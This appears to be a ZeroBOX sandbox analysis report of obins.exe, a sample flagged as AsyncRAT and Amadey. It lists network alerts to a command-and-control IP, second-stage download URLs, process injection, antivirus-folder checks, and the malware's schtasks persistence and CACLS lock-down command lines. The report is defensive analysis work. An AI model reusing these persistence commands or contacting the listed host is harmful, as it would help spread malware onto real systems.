popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

obins.exe

Generic Malware UPX Malicious Library Malicious Packer AntiDebug PE64 PE File OS Processor Check PE32 .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 12, 2023, 6:08 p.m. June 12, 2023, 6:10 p.m.
Size 1.0MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 8a06751312436a705c6404180c8b1519
SHA256 0875f2085b2f40b96db96d317cfdd1d870541182d4200de33fae9cbefaf07797
CRC32 73F05314
ssdeep 12288:aV8Jo5Xb+qCPuwvko4WzuqimH8ISEW4Wq4/OS7oS/8lTkJKaG0BHDKnn2yoSXkHN:aV84dM1DyqRrJ55KU882tMkHWiP
Yara
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
45.9.74.80 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49174 -> 45.9.74.80:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 45.9.74.80:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49174 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.103:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49177 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.103:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49177 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://45.9.74.80/0bjdn2Z/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.9.74.80/3eef203fb515bda85f514e168abb5973.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.9.74.80/setup.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.9.74.80/toolspub2.exe
request POST http://45.9.74.80/0bjdn2Z/index.php
request GET http://45.9.74.80/3eef203fb515bda85f514e168abb5973.exe
request GET http://45.9.74.80/setup.exe
request GET http://45.9.74.80/toolspub2.exe
request POST http://45.9.74.80/0bjdn2Z/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00410000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00292000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0029a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 90112
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4161536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03870000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2180
region_size: 9351168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03c70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 159744
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00af2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 90112
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00adf000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2284
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\2a344302.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
file C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\ss41.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\ss41.exe
file C:\Users\test22\AppData\Local\Temp\2a344302.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
file C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
file C:\Users\test22\AppData\Local\Temp\2a344302.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $oxȯ+¦ü+¦ü+¦ü5K"ü ¦ü5K3ü;¦ü5K%ü@¦ü ßÝü$¦ü+§ü®¦ü5K,ü*¦ü5K2ü*¦ü5K7ü*¦üRich+¦üPEL€v4bà  d@ÆjND€@@P«˜VB€Dg@ ª ºòA€ ЪÈ ð/@Ü.text>b@d@ `.dataÀˆi€@Nh@@À.rsrc ºª¼¶@@@.relocÈЪ€rA@BÈm@Úm@¤m@þi@j@.j@Bj@Vj@fj@tj@Šj@žj@®j@Æj@Øj@æj@új@ k@&k@6k@Hk@Tk@dk@nk@~k@œk@ôi@Âk@Úk@øk@ l@l@,l@<l@Ll@jl@‚l@šl@¦l@¼l@Îl@Þl@ðl@m@ m@6m@Jm@.r@âi@Îi@²k@Ài@r@r@öq@æq@Òq@Fn@Rn@Zn@hn@zn@Œn@˜n@¦n@¾n@Ön@în@ün@ o@o@$o@.o@Fo@Vo@no@zo@Žo@¢o@¾o@Üo@ðo@üo@p@p@,p@8p@`p@zp@’p@¬p@Âp@Üp@öp@q@q@(q@6q@Dq@Vq@fq@xq@Šq@ q@²q@Âq@,n@lm@†m@zm@n@øm@š;@ÿ]@T˜@™Á@„@ ä@°^@“°…d0P0P$bad allocation¬0@ñ9@ä9@Unknown exceptionCorExitProcessmscoree.dllô0@hD@EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocccsUTF-8UTF-16LEUNICODE(null)(null)EEE50P( 8PX700WP `h````xpxxxxruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: À À–ÀÀŽÀÀÀ‘À’À“À  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=€€†€€†€†‚€EEE………00€P€ˆ('8PW€700PPˆ (€ˆ€€`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLL Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vec
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $oxȯ+¦ü+¦ü+¦ü5K"ü ¦ü5K3ü;¦ü5K%ü@¦ü ßÝü$¦ü+§ü®¦ü5K,ü*¦ü5K2ü*¦ü5K7ü*¦üRich+¦üPELÇl4bà  D`+ND`@Ð.ž9€H Ð- º.È 80ð/@Ü.textCD `.data n*`H@À.rsrc ºÐ-¼`@@.reloc\2.4@B˜NªNtNÎJèJþJK&K6KDKZKnK~K–K¨K¶KÊKÜKöKLL$L4L>LNLlLÄJ’LªLÈLÚLêLüL MM:MRMjMvMŒMžM®MÀMÖMðMNNþR²JžJ‚LJèRÖRÆR¶R¢RO"O*O8OJO\OhOvOŽO¦O¾OÌOÚOæOôOþOP&P>PJP^PrPŽP¬PÀPÌPÞPîPüPQ0QJQbQ|Q’Q¬QÆQàQìQøQRR&R6RHRZRpR‚R’RüN<NVNJNâNÈNš;@ÿ]@T˜@™Á@„@ ä@°^@»æ‚dCP0P$bad allocation¬0@ñ9@ä9@Unknown exceptionCorExitProcessmscoree.dllô0@hD@EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocccsUTF-8UTF-16LEUNICODE(null)(null)EEE50P( 8PX700WP `h````xpxxxxruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: À À–ÀÀŽÀÀÀ‘À’À“À  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=€€†€€†€†‚€EEE………00€P€ˆ('8PW€700PPˆ (€ˆ€€`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLL Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vec
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $oxȯ+¦ü+¦ü+¦ü5K"ü ¦ü5K3ü;¦ü5K%ü@¦ü ßÝü$¦ü+§ü®¦ü5K,ü*¦ü5K2ü*¦ü5K7ü*¦üRich+¦üPELš‰Òbà  ,^+ND@@°-5ځì0 °, ºp-Ð ð/@Ü.textæ+, `.data n*@0@À.rsrc º°,¼H@@.reloc¨1p-2@Bp7‚7L7¦3À3Ö3ê3þ34424F4V4n4€4Ž4¢4´4Î4Þ4ð4ü4 55&5D5œ3j5‚5 5²5Â5Ô5ä5ô56*6B6N6d6v6†6˜6®6È6Þ6ò6Ö;Š3v3Z5h3À;®;ž;Ž;z;î7ú788"848@8N8f8~8–8¤8²8¾8Ì8Ö8î8þ89"969J9f9„9˜9¤9¶9Æ9Ô9à9:":::T:j:„:ž:¸:Ä:Ð:Þ:ì:þ:; ;2;H;Z;j;Ô77.7"7º7 7š;@ÿ]@T˜@™Á@„@ ä@°^@Whcd+P0P$bad allocation°0@ñ9@ä9@Unknown exceptionCorExitProcessmscoree.dllø0@hD@EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocccsUTF-8UTF-16LEUNICODE(null)(null)EEE50P( 8PX700WP `h````xpxxxxruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: À À–ÀÀŽÀÀÀ‘À’À“À  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=€€†€€†€†‚€EEE………00€P€ˆ('8PW€700PPˆ (€ˆ€€`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLL Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vec
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00106400', u'virtual_address': u'0x00002000', u'entropy': 7.266959458813478, u'name': u'.text', u'virtual_size': u'0x001062a4'} entropy 7.26695945881 description A section with a high entropy has been found
entropy 0.998097050428 description Overall entropy of this PE file is high
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
host 45.9.74.80
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2508
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000a8
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2508
process_handle: 0x000000a8
1 1 0
Process injection Process 2284 called NtSetContextThread to modify thread in remote process 2508
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000a4
process_identifier: 2508
1 0 0
Process injection Process 2284 resumed a thread in remote process 2508
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000a4
suspend_count: 1
process_identifier: 2508
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline CACLS "..\207aa4515d" /P "test22:R" /E
cmdline CACLS "..\207aa4515d" /P "test22:N"
